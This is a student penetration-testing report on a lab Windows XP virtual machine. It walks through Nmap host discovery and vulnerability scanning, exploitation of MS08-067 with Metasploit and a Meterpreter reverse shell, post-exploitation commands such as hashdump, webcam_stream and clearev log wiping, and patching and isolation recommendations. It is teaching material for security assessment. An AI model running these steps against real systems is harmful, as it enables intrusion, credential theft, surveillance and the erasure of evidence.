Vulnerability Assessment & Penetration Testing Report
on
Windows XP
Vulnerability assessment is the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, applications and network infrastructure, and of giving the organization that commissioned the assessment the knowledge, awareness and risk background it needs to understand the threats to its environment and react appropriately.
This Vulnerability Assessment & Penetration Testing project on Windows XP was done by ICSS student Prashant Kumar. The full process is described below.
Project Name: Vulnerability Assessment & Penetration Testing on Windows XP
Author Name: Prashant Kumar
Publish Date: 24-07-2018
Introduction:
Vulnerability Assessment and Penetration Testing (VAPT) is a systematic analysis of the security posture of information systems. Vulnerability assessment (VA) blends automated scanning with analysis by a security expert. It gives only a partial evaluation, because a scanner reports what it can detect, not what can actually be exploited; actually testing the findings by getting past the identified barriers is therefore a useful complement, since it confirms which findings are real and uncovers access paths the assessment missed. Penetration testing, aka "pen testing", is the practice of testing a computer system, network or web application to find vulnerabilities that an attacker could exploit.
Vulnerability assessments and pen tests can be automated with software or performed manually. Either way, the process includes gathering information about the target before the test (reconnaissance), identifying possible entry points, attempting to break in (either virtually or for real) and reporting the findings.
The main objective of penetration testing is to determine security weaknesses. A pen test can also be used to test an organization's compliance with its security policy, its employees' security awareness and its ability to identify and respond to security incidents. The testers who carry out the attack side are often called the "Red Team".
Life cycle of penetration testing:
Reconnaissance
Reconnaissance is the information-gathering work done before any real attack is planned. The idea is to collect as much useful information about the target as possible. Reconnaissance is usually the longest phase, sometimes lasting weeks or months. Here, however, the target is already known: a Windows XP machine connected to the same network as the attacking machine. To find it we run an Nmap scan.
After the Nmap scan, the live hosts are:
Now we need the OS details of every system on the network so that we can pick out the target. First we separate out the live IP addresses: save the host-discovery result to a text file and then filter the addresses out of it with the following commands (-sn is the current name of the old -sP ping scan; version detection does nothing in a ping scan, so -sV is dropped here):
nmap -sn 192.168.31.1-255 > livehosts.txt
grep "Nmap scan report for" livehosts.txt | grep -oE '[0-9]+(\.[0-9]+){3}' > ip.txt
The second command pulls out the dotted address itself rather than the fifth space-separated field, because for a host with a reverse DNS name Nmap prints "Nmap scan report for NAME (IP)" and the fifth field is the name, not the address.
The output is:
Now we have to check which of them is the Windows XP machine, so we run Nmap with service detection (-sV) and OS detection (-O) against the list of live IPs:
nmap -sV -O -iL ip.txt > osdetails.txt
And the output is:
Starting Nmap 7.60 ( https://nmap.org ) at 2018-07-23 02:06 IST
Nmap scan report for XiaoQiang (192.168.31.1)
Host is up (0.014s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE VERSION
53/tcp   open  domain  dnsmasq 2.71
80/tcp   open  http    nginx
8192/tcp open  http    Tengine httpd
8193/tcp open  http    nginx
8899/tcp open  http    Tengine httpd
MAC Address: 78:11:DC:18:76:21 (Xiaomi Electronics,co.)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=7/23%OT=53%CT=1%CU=41503%PV=Y%DS=1%DC=D%G=Y%M=7811DC%T
OS:M=5B54EBAA%P=i686-pc-linux-gnu)SEQ(SP=0%GCD=0%ISR=0%TI=Z%CI=Z%II=I%TS=7)
OS:SEQ(SP=0%GCD=0%ISR=0%TI=Z%CI=Z%TS=7)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3
OS:=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=3890%W2=3
OS:890%W3=3890%W4=3890%W5=3890%W6=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M5B4NNSNW
OS:7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=A%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 1 hop
Nmap scan report for 192.168.31.27
Host is up (0.016s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
62078/tcp open tcpwrapped
MAC Address: 88:19:08:C9:D6:A8 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=7/23%OT=62078%CT=1%CU=31349%PV=Y%DS=1%DC=D%G=Y%M=88190
OS:8%TM=5B54EBAA%P=i686-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=RD%TS
OS:=A)OPS(O1=M5B4NW6NNT11SLL%O2=M5B4NW6NNT11SLL%O3=M5B4NW6NNT11%O4=M5B4NW6N
OS:NT11SLL%O5=M5B4NW6NNT11SLL%O6=M5B4NNT11SLL)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W
OS:4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%T=40%W=FFFF%O=M5B4NW6SLL%CC=Y%Q=)T1(
OS:R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R
OS:=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=40%W=0%S=Z%A=S%F=A
OS:R%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=38%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=0%RU
OS:D=G)IE(R=Y%DFI=S%T=40%CD=S)
Network Distance: 1 hop
Nmap scan report for 192.168.31.224
Host is up (0.00062s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
MAC Address: 00:0C:29:BE:B1:2B (VMware)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Nmap scan report for 192.168.31.44
Host is up (0.000017s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.1
Network Distance: 0 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 6 IP addresses (4 hosts up) scanned in 261.30 seconds.
From these results, 192.168.31.224 is our target: it is a VMware guest that Nmap fingerprints as Windows XP Professional SP2 or Windows Server 2003, and the SMB service banner on 445/tcp names Windows XP explicitly. (192.168.31.1 is the Xiaomi router, 192.168.31.27 exposes only the iOS lockdown port 62078, and 192.168.31.44, at network distance 0, is our own Ubuntu attack box.) Now that the target is identified we move on to the next part.
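To make the host-selection step repeatable rather than a matter of reading a colour in a screenshot, here is a small parser for Nmap's normal output. It is an added example written for this page, not code from the original report; the embedded SAMPLE is the report's own scan output above, abridged. It also shows what the report's `grep "for" | cut -d " " -f5` pipeline really yields on this network: the router's reverse-DNS name XiaoQiang instead of 192.168.31.1, plus the word "for" from the "No exact OS matches for host" line.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Sample input: the report's own `nmap -sV -O -iL ip.txt` output, abridged.
SAMPLE = """\
Nmap scan report for XiaoQiang (192.168.31.1)
PORT     STATE SERVICE VERSION
53/tcp   open  domain  dnsmasq 2.71
MAC Address: 78:11:DC:18:76:21 (Xiaomi Electronics,co.)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Nmap scan report for 192.168.31.27
PORT      STATE SERVICE    VERSION
62078/tcp open  tcpwrapped
MAC Address: 88:19:08:C9:D6:A8 (Unknown)
Nmap scan report for 192.168.31.224
Host is up (0.00062s latency).
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp open  http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
MAC Address: 00:0C:29:BE:B1:2B (VMware)
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Nmap scan report for 192.168.31.44
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
OS details: Linux 3.10 - 4.1
"""

# "Nmap scan report for NAME (IP)" when reverse DNS resolved, else "... for IP".
REPORT_RE = re.compile(r"^Nmap scan report for (?:(?P<name>\S+) \()?"
                       r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)?$")
PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+"
                     r"(?P<service>\S+)(?:\s+(?P<version>.*))?$")
MAC_RE = re.compile(r"^MAC Address: (?P<mac>(?:[0-9A-F]{2}:){5}[0-9A-F]{2})"
                    r"(?: \((?P<vendor>.*)\))?$")


@dataclass
class Port:
    port: int
    proto: str
    state: str
    service: str
    version: str


@dataclass
class Host:
    ip: str
    name: Optional[str] = None
    mac: Optional[str] = None
    vendor: Optional[str] = None
    running: Optional[str] = None
    os_details: Optional[str] = None
    service_info: Optional[str] = None
    ports: List[Port] = field(default_factory=list)

    def mentions(self, needle: str) -> bool:
        """True if the OS guess, Service Info or any service banner names needle."""
        texts = [self.running, self.os_details, self.service_info]
        texts += [p.version for p in self.ports]
        return any(needle.lower() in t.lower() for t in texts if t)


def parse_nmap(text: str) -> List[Host]:
    """One Host per 'Nmap scan report for' block of Nmap normal output."""
    hosts: List[Host] = []
    cur: Optional[Host] = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if m := REPORT_RE.match(line):
            cur = Host(ip=m["ip"], name=m["name"])
            hosts.append(cur)
        elif cur is None:
            continue  # banner lines before the first host block
        elif m := PORT_RE.match(line):
            cur.ports.append(Port(int(m["port"]), m["proto"], m["state"],
                                  m["service"], (m["version"] or "").strip()))
        elif m := MAC_RE.match(line):
            cur.mac, cur.vendor = m["mac"], m["vendor"]
        elif line.startswith("Running: "):
            cur.running = line[len("Running: "):]
        elif line.startswith("OS details: "):
            cur.os_details = line[len("OS details: "):]
        elif line.startswith("Service Info: "):
            cur.service_info = line[len("Service Info: "):]
    return hosts


def live_ips(text: str) -> List[str]:
    """Addresses only, in scan order: the job the grep/cut pipeline was meant to do."""
    return [h.ip for h in parse_nmap(text)]


def find_targets(text: str, needle: str = "Windows XP") -> List[Host]:
    """Hosts whose OS fingerprint or banners name the wanted platform."""
    return [h for h in parse_nmap(text) if h.mentions(needle)]


def naive_cut_f5(text: str) -> List[str]:
    """What `grep "for" | cut -d " " -f5` really returns on the same input."""
    out = []
    for line in text.splitlines():
        if "for" in line:
            f = line.split(" ")
            out.append(f[4] if len(f) > 4 else ("" if len(f) > 1 else line))
    return out
```

Feeding it the full osdetails.txt instead of SAMPLE gives the same answer as the screenshot: only 192.168.31.224 mentions Windows XP. The same parser, with a different needle, picks out any other platform the fingerprint or banners name, so it generalises past this one target.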
Vulnerability scanning
In this part we scan the target for known vulnerabilities. Again we use Nmap, this time with the "vuln" script category, which runs every NSE script that checks for a known vulnerability (-Pn skips host discovery, since we already know the host is up):
nmap -Pn --script vuln 192.168.31.224 > vuln.txt
Because the interesting services here are SMB, the same result comes back much faster from a targeted run such as nmap -Pn -p 139,445 --script "smb-vuln*" 192.168.31.224.
The output is :
The scan reported three SMB-related script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
This one is not a finding. CVE-2012-1182 is a bug in the Samba SMB server used on Unix systems, so it does not apply to a Windows host at all, and NT_STATUS_ACCESS_DENIED means the script's RPC call was refused and the check could not be completed, not that the flaw exists. The next one is:
smb-vuln-ms08-067
MS08-067 (CVE-2008-4250) is a stack buffer overflow in the Server service's path-canonicalization code (NetAPI32), reachable by an unauthenticated attacker over SMB, and it gives remote code execution as SYSTEM on Windows 2000, XP and Server 2003. That is exactly our target. The last one listed is:
smb-vuln-ms17-010
MS17-010 (the SMBv1 bug behind EternalBlue) also gives remote code execution over SMB. It is not limited to Windows servers: Windows XP is affected too, and Microsoft shipped an out-of-band XP fix for it (KB4012598) in May 2017. What is limited is the tooling: the well-known Metasploit ms17_010_eternalblue module targets Windows 7 and Server 2008 R2, and exploiting XP through MS17-010 needs the named-pipe variant (ms17_010_psexec) instead. For this target MS08-067 is the more direct route.
So we will exploit the machine through MS08-067 using Metasploit.
Attack & Penetration
Now that we know the vulnerability, we search for it in the Metasploit Framework database. Metasploit ships a large collection of exploits, payloads and auxiliary modules. It is launched by typing msfconsole in a terminal.
Now we search for the ms08_067 module:
search ms08_067
The description of this module is:
The module is selected with the following command:
use exploit/windows/smb/ms08_067_netapi
The following commands list the payloads available for this module and set the one we want:
show payloads
We are going to use the windows/meterpreter/reverse_tcp payload, which makes the target connect back to our listener (so no inbound port on the target needs to be reachable beyond 445/tcp itself):
set payload windows/meterpreter/reverse_tcp
show options
set RHOST 192.168.31.224 (target IP address; current Metasploit versions call this option RHOSTS)
set LHOST 192.168.31.44 (attacker IP address, where the reverse shell connects back)
The module's default target "Automatic" fingerprints the SMB service to pick the right return addresses, and this module supports the check command, so running check first confirms the host is vulnerable without firing the exploit. Then, to get a session on the target, run the exploit command.
Post exploitation
Once we have a Meterpreter session we effectively have full control of the target. Because MS08-067 exploits the Server service, which runs as LocalSystem, the session normally starts as NT AUTHORITY\SYSTEM already; getuid shows the current user, and the command below is for the case where a session lands as a lower-privileged user:
getsystem
To confirm that we are on the target, check its IP address with:
ipconfig
The following screenshot shows the result:
Typing help lists all available commands. Some common ones are:
sysinfo (OS, architecture and hostname of the target)
getuid (the user the session runs as)
hashdump (dump the local SAM password hashes; needs SYSTEM)
webcam_stream (if the target machine has a webcam)
download (copy a file from the target to the attacker)
cd
pwd
ls
reboot
When the task is completed and the target machine is no longer needed, we clear our footprints with:
clearev
clearev wipes the Application, System and Security event logs. Note that Windows records the clearing of the Security log as its own audit event (ID 517 on XP/2003, 1102 on later versions), so on a monitored host this action is itself a loud indicator; in a real engagement, what may be deleted is governed by the rules of engagement, and the usual practice is to leave evidence in place and hand the client a list of artifacts instead.
Conclusion & Recommendations
The vulnerability reviewed here lets an unauthenticated attacker on the same network take full (SYSTEM) control of the machine, so any data on it can be read or misused. The machine must be protected against this.
MS08-067 was fixed by Microsoft in October 2008 (update KB958644); installing that update through Windows Update removes the vulnerability, and on Windows XP Professional its presence can be verified with wmic qfe get HotFixID | findstr KB958644. Note, however, that Windows XP reached end of support in April 2014 and no longer receives security updates (the May 2017 MS17-010 fix was a one-off exception), so an XP host that must remain on the network should be isolated, with SMB (TCP 139 and 445) blocked from untrusted segments; the real fix is to migrate to a supported operating system.
Recommendations are:
- Always keep the machine and its software updated, and retire operating systems that no longer receive patches.
- Use a good antivirus.
- Use a host or network firewall, and in particular do not expose SMB (TCP 139/445) to untrusted networks.
- Don't install software from unknown sources.
…………End of the report………..